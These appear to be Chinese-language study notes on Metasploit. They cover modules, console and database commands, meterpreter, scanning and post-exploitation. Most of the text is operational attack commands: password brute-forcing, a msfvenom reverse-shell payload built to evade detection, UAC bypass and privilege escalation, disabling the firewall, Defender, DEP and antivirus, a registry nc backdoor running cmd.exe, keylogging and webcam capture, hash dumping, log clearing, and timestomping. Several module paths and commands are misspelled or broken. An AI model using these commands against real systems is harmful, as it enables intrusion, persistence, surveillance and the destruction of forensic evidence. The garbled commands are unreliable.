全稱:metasploit
0*01模塊介紹
/usr/share/metasploit-framework/modules
auxiliary用於各種輔助功能 比如:信息收集、枚舉、指紋探測、掃描
encoders編碼模塊,對payload進行加密
evasion
exploits漏洞利用腳本目錄
nops維持payload穩定性
payloads
post
0*02簡單使用
msfupdate更新
命令msfconsole最流行的使用方式
reload_all 手動添加模塊後重新加載
msfconsole -q安靜啓動,不顯示banner信息
-r
banner小貼士以及其他信息
color 關閉顏色提示
connect-h 相當於console界面的nc
show auxiliary/exploits/payloads/encoders/nops 顯示模塊的信息
search關鍵字 可以多條件搜索
use dos/windows/smb/ms09_001_write
show 選中模塊後的命令 options/advanced... edit
check 執行前檢查漏洞利用back
0*03數據庫
msfdb start
service postgresql start
netstat -pantu | grep 5432檢查服務
db_status
db_rebuild_cache 建立緩存,提高速度
db_nmap hosts
0*04基本功能
每個模塊下set /unset設置變量/取消變量 setg/unsetg設置全局/取消全局 save
run /exploit
jobs /kill 0
load/unload/loadpath 加載/卸載外部工具插件/加載自己開發的插件
show targets
session
session -l /-i 查看shell會話
route
irb
resource 指定資源文件 簡化攻擊模塊配置 .rc文件是默認文件名
簡單攻擊:use 模塊
show options 查看需要設置的項
set rhost 設置對方ip
set target 指定操作系統
set payload 路徑/模塊
set lhost 本地ip
exploit -j 注意防火牆
generate 生成payload
generate -b '\x00''\ff' 繞過壞字符
generate -s 10 生成的payload前面加10個字符實現一定繞過
generate -t python/java/c ... 以其他語言格式生成
0*05meterpreter
meterpreter 是一個更高級更隱蔽可擴展的payload
命令:
help background從meter界面來回切換msf界面
cd pwd ls/dir cat mkdir/rmdir創建刪除文件夾 常用linux文件命令都可以用
lpwd 顯示linux當前工作目錄
run/bgrun 正常/後臺運行各種腳本模塊等
clearev download 清除目標系統日誌/從目標主機下載文件到攻擊主機 eventvwr查看windows日誌
upload /usr/share/window-bainares/nc.exe c:\\windows\\system32
execute -f **.exe -i -H 執行上傳工具 -f指定程序 -i進行交互 -h隱藏
getuid /getsystem /get privs/getproxy/ getpid 查看用戶賬號/強勢獲取爲sys/查看當前權限/查看滲透到目標系統生成的進程 ps查看進程 migrate port 更改進程
hashdump=runpost/windows/gather/hashdump 獲取hashdump
sysinfo /ps/ kill-pid / reboot/ shutdown /shell
show_mount /search-f /autoexec.bat
arp /netstat/ ipconfig /route
idletime/ resource 查看目標操作系統空閒時間
record_mic /webcam_list /webcam_snap -i 1 -v false 記錄麥克風聲音/列出所有攝像頭/每隔一秒拍照
0*06
信息收集
db_nmap -[s v n f ....] [ip]
search arp
use auxiliary/scanner/discovery/arp_sweep
set interface rhosts shost smac thread
search portscan
use auxiliary/scanne/portscan/syn
set interface rhosts shost smac thread
ldle掃描
use auxiliary/scanne/ip/ipidseq
set rhost ip
udp掃描
use auxiliary/scanner/discovery/udp_sweep
use auxiliary/scanner/discovery/udp_probe
密碼嗅探
use auxiliary/sniffer/psnuffle
支持.cap文件 pop3 imap ftp http get協議
snmp掃描
vi /etc/default/snmpd #偵聽地址0.0.0.0
use auxiliary/scanner/snmp/snmp_login
use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/snmp/snmp_enumusers
use auxiliary/scanner/snmp/snmp_enumshares
smb掃描
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/smb/pipe_auditor
use auxiliary/scanner/smb/pipe_dcerpc_auditor
use auxiliary/scanner/smb/smb_enumshares
use auxiliary/scanner/smb/smb_enumusers
use auxiliary/scanner/smb/smb_lookupsid
ssh掃描
use auxiliary/scanner/ssh/ssh_version
use auxiliary/scanner/ssh/ssh_login 密碼爆破
set userpass_file /usr/share/metasploit
/usr/share/metaspolit-framework/data/wordlists/root_userpass.txt
set verbose false
use auxiliary/scanner/ssh/ssh_login_pubkey公鑰登陸
set key_file id rsa
set username root
系統補丁
use post/windows/gather/enum_patches基於已經取得session
show advanced
set verbose yes
know bug in WMI query,try migrating to another process檢查失敗請遷移進程
get pid
ps
migrate [port]
mssql掃描
tcp 1433/udp 1434
use auxiliary/scanner/mssql/mssql_ping
爆破mssql密碼
use auxiliary/scanner/mssql/mssql_login
遠程執行代碼
use auxiliary/scanner/mssql/mssql_exec
set cmd net user user pass /add
FTP版本掃描
use auxiliary/scanner/ftp/ftp_version
use auxiliary/scanner/ftp/anonymons
use auxiliary/scanner/ftp/ftp_login
use auxiliary/scanner/[tab]
-display all 479 possibilities?(y or n)
VNC密碼破解
use auxiliary/scanner/vnc/vcn_login
VNC無密碼訪問
use auxiliary/scanner/vnc/vcn_none_auth
.supported;none.free access!成功
RDP遠程桌面漏洞
use auxiliary/scanner/rdp/ms12_020_check
the target is vulnerable.-->search ms12-020 搜索利用
設備後門
use auxiliary/scanner/ssh/juniper_backdoor
use auxiliary/scanner/ssh/fortinet_backdoor
vmware esxi密碼爆破
use auxiliary/scanner/vmware/vmauthd_login
use auxiliary/scanner/vmware/vmauthd_enum_vms
利用web api遠程開啓虛擬機
use auxiliary/scanner/vmware/poweron_vm
0*07HTTP弱點掃描一
過期證書:use auxiliary/scanner/http/cert
顯示目錄及文件
use auxiliary/scanner/http/dir_listing
use auxiliary/scanner/http/files_dir
WebDAV Unicode編碼身份驗證繞過
use auxdiliary/scanner/http/dir_webdav_unicode_bypass
Tomcat管理登錄
use aunalary/scanner/http/tomcat_mgr_login
基於HTTP方法的身份驗證繞過
use auxliary/scanner/http:/verb_auth_bypass
- Wordpress密碼爆破
use auxiliary/scanner/http/wordpress_login_enum
set URI /wordpress/wp-login.php
WMAP WEB應用掃描器
根據 SQLMAP的工作方式開發
load wmap
wmap_sites -a http://1.1.1.1
wmap_sites -l 查看已經添加的站點
wmap_targets -t http://1.1.1.1/mutillidae/index.php 指定目標
wmap_ run -t 顯示哪些具體模塊
wmap_ run -e 具體執行哪些模塊
wmap vulns -l 查看結果
vuIns
0*08HTTP弱點掃描二
load openvas
db_import ***.nbe
msf調用nessus執行掃描
load nessus
nessus_help
nessus_connect admin:password@ip 連接
nessus_policy_list 查看配置策略
nessus_scan_new
nessus_report_list
利用 Acrobat Reader漏洞執行 payload
構造PDF文件 exploit/windows/fileformat/ adobe_utilprint
構造惡意網站: exploit/windows/ /browser/ adobe_utilpri
Meterpreter
use pnv
run post/windows/capture/keylog_recorder
利用Fash插件漏洞執行 payload
use exploit/multi/browser/adobe_flash_hacking_team_uaf
use exploit/multi/browser/adobe_flash_opaque_background_uaf
use auxiliary/server/browser_autopwn2
利用瀏覽器漏洞執行 payload
use exploit/windows/browser/ms14_064_ole_code_execution
0*09後滲透測試
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=本機 LPORT=本地端口 -b "\x00" -e x86/shikata_ga_nai -i 7 -f exe -o a.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
獲取system
getsystem 大多數失敗,需要繞過UAC,以下需要先獲得session
use exploit/windows/local/ask
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection 動態鏈接庫dll注入或者理解爲內存注入
利用漏洞直接獲取system
use exploit/windows/local/ms13_053_schlamperei
use'exploit/windows/local/ms13_081_track_popup_menu
use exploit/windows/local/ms13_097_ie_registry_symlink
use exploit/windows/local/ppr_flatten_res
圖形化 payload
set payload windows/vncinject/reverse_tcp
set viewonly no#可操作
hashdump
Psexec模塊之 Passthehash
use exploit/windows/smb/sexes
set smbpass hash
需要提前關閉UAC
cmd.exe/k%windir%System32/reg.exe ADDHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /vEnableLUA/t REG_DWORD /d 0 /f
cmd.exe/k%windir%System32/reg.exe ADDHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /vLocalAccountTokenFilterPolicy/t REG_DWORD /d 1 /f
關閉防火牆(需要system權限)
netsh advfirewall set allprofiles state on/off
關閉windefend
net stop windefend
bitlocker磁盤加密
manage-bde -off C:
manage-bde -status C:
關閉dep
bcdedit.exe /set{current} nx AlwaysOff
殺死防病毒軟件
run killav
run post/windows/manage/killav
開啓遠程桌面服務
run post/windows/manage/enable_rdp
run getgui-e
run getgui -u yuanfh -p pass
run multi_console_command -rc clean_up_20180824.1855.rc
查看遠程桌面
screenshot
use espia
screengrab
用註冊表添加NC後門服務( meterpreter)
-upload /usr/share/windows-binaries/nc. exe C:\\windowst\\system32
-reg enumkey -k 枚舉當前主鍵下的啓動
HKLM\\software\\microsoft\\windows\\currentversion\\run
-reg setval-k
HKLM\\software\\microsoft\\windows\\currentversion\\run-v nc-d
'C:windows\system32\nc.exe Ldp 444-e cmd.exe'
-reg queryval-k
HKLM\\software\\microsoft\\windows\\currentversion\\Run-v nc
打開防火牆端口( meterpreter)
-execute -f cmd -i -H 隱蔽進桌面
-netsh firewall show opmode
-netsh firewall ad portopening TCP 4444 "test" ENABLE ALL
-shutdown -r -t 0
-nc 1.1.1.1 4444
抓包( meterpreter)
load sniffer
sniffer_interfaces 查看網卡接口
sniffer_start 2 使用網卡號
sniffer_dump 2 1. cap /sniffer- dump 2 1.cap
在內存中緩存區塊循環存儲抓包(50000包),不寫硬盤
智能過濾 meterpreter流量,傳輸全程使用 SSL/TLS加密
解包( meterpreter)
use auxiliary/sniffer/psnuffle
set PCAPFILE 1.cap
搜索文件( meterpreter)
-search -f *.ini
-search -d \\路徑 -f *.*
john the ripper破解口令( meterpreter的system權限)
-use post/windows/gather/hashdump
-run 保存在/tmp目錄
.文件系統訪問會留下痕跡,電子取證重點關注
.滲透測試和攻擊者往往希望銷燬文件系統訪問痕跡
.最好的避免被電子取證發現的方法:不要碰文件系統
-Meterpreter的先天優勢所在(完全基於內存)
.MAC時間(Modified/Accessed/Changed)LINUX系統
- Is -I --time=atime/ctime 1.txt 默認是mtime
- stat 1.txt 列出mac時間
- touch -d "2 days ago" 1.txt 修改mac時間
- touch -t 1501010101 1.txt -年-月-日-時-分-秒
MACE :MFT entry WINDOWS系統
-MFT:NTFS文件系統的主文件分配表 Master File Table
-通常1024字節或2個硬盤扇區,其中存放多項enty信息
-包含文件大量信息(大小名稱目錄位置磁盤位置創建日期)
-更多信息可研究文件系統取證分析技術
Timestomp( meterpreter)
-timestomp -v 1.txt 顯示詳細時間
-timestomp -f c:\\autoexec.bat 1.txt
-b -r擦除MACE時間信息,目前此參數功失效
-m/-a/-c/-e/-z
-timestomp- z MM/DD/YYYY HH24:MI:SS" 2.txt